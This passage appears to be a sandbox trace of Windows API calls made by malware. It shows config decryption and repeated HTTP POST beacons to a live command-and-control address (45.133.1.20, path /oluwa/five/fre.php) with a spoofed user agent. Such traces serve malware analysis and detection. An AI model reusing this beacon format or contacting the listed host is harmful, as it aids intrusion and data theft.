(lpLibFileName="shlwapi") returned 0x77680000 [0321.286] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.287] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.287] GetProcessHeap () returned 0x6a0000 [0321.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0321.288] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.288] GetProcessHeap () returned 0x6a0000 [0321.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0321.288] GetProcessHeap () returned 0x6a0000 [0321.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.289] GetProcessHeap () returned 0x6a0000 [0321.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0321.289] GetProcessHeap () returned 0x6a0000 [0321.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0321.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0321.304] GetProcessHeap () returned 0x6a0000 [0321.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0321.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.306] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.307] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.309] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.309] GetProcessHeap () returned 0x6a0000 [0321.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0321.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.310] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0321.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.311] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.313] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0321.313] GetProcessHeap () returned 0x6a0000 [0321.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.314] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0321.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.316] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0321.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.317] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0321.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.318] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0321.318] GetProcessHeap () returned 0x6a0000 [0321.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.318] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0321.318] GetProcessHeap () returned 0x6a0000 [0321.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0321.318] socket (af=2, type=1, protocol=6) returned 0xc78 [0321.319] connect (s=0xc78, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0321.343] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0321.343] GetProcessHeap () returned 0x6a0000 [0321.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0321.343] GetProcessHeap () returned 0x6a0000 [0321.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0321.344] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.345] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.345] GetProcessHeap () returned 0x6a0000 [0321.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df1a8 [0321.345] GetProcessHeap () returned 0x6a0000 [0321.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.346] GetProcessHeap () returned 0x6a0000 [0321.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0321.346] GetProcessHeap () returned 0x6a0000 [0321.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0321.346] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.347] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.347] GetProcessHeap () returned 0x6a0000 [0321.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0321.347] GetProcessHeap () returned 0x6a0000 [0321.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.348] send (s=0xc78, buf=0x6bd460*, len=242, flags=0) returned 242 [0321.348] send (s=0xc78, buf=0x6bb998*, len=159, flags=0) returned 159 [0321.348] GetProcessHeap () returned 0x6a0000 [0321.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0321.348] recv (in: s=0xc78, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0321.432] GetProcessHeap () returned 0x6a0000 [0321.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0321.435] GetProcessHeap () returned 0x6a0000 [0321.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0321.436] GetProcessHeap () returned 0x6a0000 [0321.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df1a8 | out: hHeap=0x6a0000) returned 1 [0321.436] GetProcessHeap () returned 0x6a0000 [0321.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0321.436] closesocket (s=0xc78) returned 0 [0321.437] GetProcessHeap () returned 0x6a0000 [0321.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0321.437] GetProcessHeap () returned 0x6a0000 [0321.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.437] GetProcessHeap () returned 0x6a0000 [0321.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0321.438] GetProcessHeap () returned 0x6a0000 [0321.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0321.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19e0) returned 0xc78 [0321.440] Sleep (dwMilliseconds=0xea60) [0321.442] GetProcessHeap () returned 0x6a0000 [0321.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0321.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0321.457] GetProcessHeap () returned 0x6a0000 [0321.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9c98 [0321.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.459] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9c98, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.461] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.462] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.462] GetProcessHeap () returned 0x6a0000 [0321.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c98 | out: hHeap=0x6a0000) returned 1 [0321.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.464] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0321.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.465] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.466] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0321.466] GetProcessHeap () returned 0x6a0000 [0321.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.467] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.475] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.476] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.477] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.477] GetProcessHeap () returned 0x6a0000 [0321.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.477] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.477] GetProcessHeap () returned 0x6a0000 [0321.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0321.478] GetProcessHeap () returned 0x6a0000 [0321.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.478] GetProcessHeap () returned 0x6a0000 [0321.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0321.478] GetProcessHeap () returned 0x6a0000 [0321.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0321.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.479] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0321.494] GetProcessHeap () returned 0x6a0000 [0321.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0321.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.495] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0321.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.496] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.497] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.497] GetProcessHeap () returned 0x6a0000 [0321.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0321.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.499] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0321.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.500] CryptDestroyKey (hKey=0x6ad020) returned 1 [0321.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.501] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0321.501] GetProcessHeap () returned 0x6a0000 [0321.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.503] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0321.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.504] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0321.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.505] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0321.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.506] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0321.506] GetProcessHeap () returned 0x6a0000 [0321.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.506] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0321.506] GetProcessHeap () returned 0x6a0000 [0321.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0321.506] socket (af=2, type=1, protocol=6) returned 0xc7c [0321.507] connect (s=0xc7c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0321.529] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0321.529] GetProcessHeap () returned 0x6a0000 [0321.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0321.529] GetProcessHeap () returned 0x6a0000 [0321.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0321.530] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.531] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.531] GetProcessHeap () returned 0x6a0000 [0321.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df1a8 [0321.531] GetProcessHeap () returned 0x6a0000 [0321.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.531] GetProcessHeap () returned 0x6a0000 [0321.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0321.531] GetProcessHeap () returned 0x6a0000 [0321.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0321.532] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.533] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.533] GetProcessHeap () returned 0x6a0000 [0321.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0321.533] GetProcessHeap () returned 0x6a0000 [0321.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.534] send (s=0xc7c, buf=0x6bd460*, len=242, flags=0) returned 242 [0321.535] send (s=0xc7c, buf=0x6bb998*, len=159, flags=0) returned 159 [0321.535] GetProcessHeap () returned 0x6a0000 [0321.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0321.535] recv (in: s=0xc7c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0321.612] GetProcessHeap () returned 0x6a0000 [0321.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0321.613] GetProcessHeap () returned 0x6a0000 [0321.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0321.614] GetProcessHeap () returned 0x6a0000 [0321.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df1a8 | out: hHeap=0x6a0000) returned 1 [0321.615] GetProcessHeap () returned 0x6a0000 [0321.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0321.615] closesocket (s=0xc7c) returned 0 [0321.616] GetProcessHeap () returned 0x6a0000 [0321.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0321.617] GetProcessHeap () returned 0x6a0000 [0321.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.617] GetProcessHeap () returned 0x6a0000 [0321.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0321.618] GetProcessHeap () returned 0x6a0000 [0321.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0321.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19e4) returned 0xc7c [0321.621] Sleep (dwMilliseconds=0xea60) [0321.622] GetProcessHeap () returned 0x6a0000 [0321.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0321.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0321.643] GetProcessHeap () returned 0x6a0000 [0321.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0321.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.644] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.645] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.646] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.646] GetProcessHeap () returned 0x6a0000 [0321.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0321.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.648] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0321.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.649] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.650] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0321.650] GetProcessHeap () returned 0x6a0000 [0321.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.651] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.652] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.653] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.658] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.658] GetProcessHeap () returned 0x6a0000 [0321.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0321.658] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", 